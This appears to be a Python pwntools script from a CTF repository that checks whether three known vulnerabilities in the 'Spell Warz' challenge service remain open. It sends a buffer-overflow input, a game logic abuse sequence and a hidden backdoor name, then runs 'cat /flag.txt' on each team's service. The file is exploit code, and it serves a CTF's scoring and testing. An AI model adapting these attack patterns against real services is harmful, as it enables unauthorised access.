myitinos
/
spell-warz-again-final


								#! /usr/bin/env python2

								from pwn import process, remote


								HOST = "192.168.2.20"

								TOTAL_TEAMS = 1

								FORMAT = "SlashRootCTF"


								def run():

								    # return process(FILENAME)

								    return remote("127.0.0.1", 60204)


								def poc0(host, port):

								    p = remote(host, port)

								    p.recvuntil(">")

								    p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))

								    msg = p.recvuntil(">")

								    # print(msg)

								    if "young" in msg:

								        p.sendline("y")

								        p.recvuntil(">")

								        p.sendline("2")

								        p.recvuntil(">")

								        p.sendline("4")

								        p.recvuntil(">")

								        p.sendline("y")

								        for _ in xrange(10):

								            p.recvuntil(">")

								            p.sendline("99")

								        p.sendline("cat /flag.txt")

								        flag = p.recvuntil("}")

								        # print flag

								        if FORMAT in flag:

								            return True

								        else:

								            return False

								    else:

								        return False


								def poc1(host, port):

								    p = remote(host, port)

								    p.recvuntil(">")

								    p.sendline("Leo")

								    p.recvuntil(">")

								    p.sendline("y")

								    for _ in range(2):

								        p.recvuntil(">")

								        p.sendline("3")

								        p.recvuntil(">")

								        p.sendline("0")

								        if "Who" in p.recvuntil(">"):

								            return False

								        p.sendline("y")

								        p.recvuntil(">")

								        p.sendline("1")

								    p.recvuntil(">")

								    p.sendline("4")

								    p.recvuntil(">")

								    p.sendline("y")

								    for _ in range(10):

								        p.recvuntil(">")

								        p.sendline("99")

								    p.sendline("cat /flag.txt")

								    flag = p.recvuntil("}")

								    if FORMAT in flag:

								        return True

								    else:

								        return False


								def poc2(host, port):

								    p = remote(host, port)

								    p.recvuntil(">")

								    p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")

								    p.recvuntil(">")

								    p.sendline("y")

								    p.recvuntil(">")

								    p.sendline("6")

								    if "Lv: 1000000" in p.recvuntil(">"):

								        p.sendline("2")

								        p.recvuntil(">")

								        p.sendline("4")

								        p.recvuntil(">")

								        p.sendline("y")

								        for _ in xrange(10):

								            p.recvuntil(">")

								            p.sendline("99")

								        p.sendline("cat /flag.txt")

								        flag = p.recvuntil("}")

								        if FORMAT in flag:

								            return True

								        else:

								            return False

								    else:

								        return False


								if __name__ == "__main__":

								    for i in range(1, TOTAL_TEAMS+1):

								        print poc0(HOST, (60004 + (i*100)))

								        print poc1(HOST, (60004 + (i*100)))

								        print poc2(HOST, (60004 + (i*100)))